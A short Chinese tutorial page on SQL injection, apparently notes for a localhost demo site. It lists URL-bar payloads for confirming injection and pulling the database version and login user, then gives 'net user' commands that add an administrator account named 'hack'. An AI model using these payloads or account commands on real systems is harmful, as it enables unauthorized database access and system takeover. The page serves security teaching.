当前位置: 代码迷 >> SQL >> SQL流入攻击(中)
  详细解决方案

SQL流入攻击(中)

热度:64   发布时间:2016-05-05 12:53:35.0
SQL注入攻击(中)

源文件: d:\code\web-attackDome\web-attackDome\sql-injection\地址栏注入演示\NewsDetails.aspx.cs

Articles

ID
判断是否存在注入:
第一步:'

第二步:http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '1'='1

第三步:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '2'='1
====================================================================================查版本:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select @@version) and '1'='1

查用户:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select system_user) and '1'='1


net user hack 123456 /add

net localgroup administrators hack /add

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.